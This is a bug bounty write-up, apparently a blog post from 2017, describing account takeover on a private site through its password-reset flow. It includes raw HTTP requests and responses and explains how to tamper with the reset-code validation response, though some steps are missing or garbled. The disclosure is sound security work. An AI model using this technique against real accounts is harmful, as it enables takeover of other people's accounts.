Account Takeover Via Password Reset Functionality

Account Takeover Via Password Reset Functionality

Dipak kumar Das's photo
Dipak kumar Das
·Aug 12, 2017·

Subscribe to my newsletter and never miss my upcoming articles

Play this article

Hi everyone , here is one of my write-up on account takeover via password reset functionality . As the site is private let assume as site.com

So basically the password reset functionality work flow is like below

  • User requested for password reset
  • Then one code(12 digit Alphanumeric ) sent to the registered Email id
  • User have to provide the correct code then application ask to set new password

So lets start

to reset password user need to visit site.com/forgetpassword

the below form will appear ,

So here let say we use victim email id and requested for password reset

after that the below screen will appear , here we need to enter the correct code to reset the password . so the code is 12 digit so no way to brute force.

so here used some random code like "hacker" and i saw there is no validation of code length

so here is the request of code validation
_POST /memberp/users/send_reser_instruction
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: site.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Request-With: XMLHttpRequest
Referer: site.com/forgotpassword
Cookie: bla=bla; _method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHRGaWdyWT0==_

here is the response

_HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8

The Password reset code entered by you is either invalid or has expired.
_

so after that i have provided the correct code to analysis the back-end validation

so for a correct code in the response body just changed like this

HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8

Content-length: 210

so as you can see it just validating the prcemailid2 value which we can get from the 1st request

_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR

so just in the response body you need to replace with below code

so the final response will be like this**

HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8

Content-length: 210
__

boom now the below screen appears

Now provide the new password and confirm new password and submit the request , password changed successfully . Navigate to login panel and login with new password .

successfully own the account

Status :Fixed
Bounty Rewarded

Did you find this article valuable?

Support Dipak kumar Das by becoming a sponsor. Any amount is appreciated!

Learn more about Hashnode Sponsors
 
Share this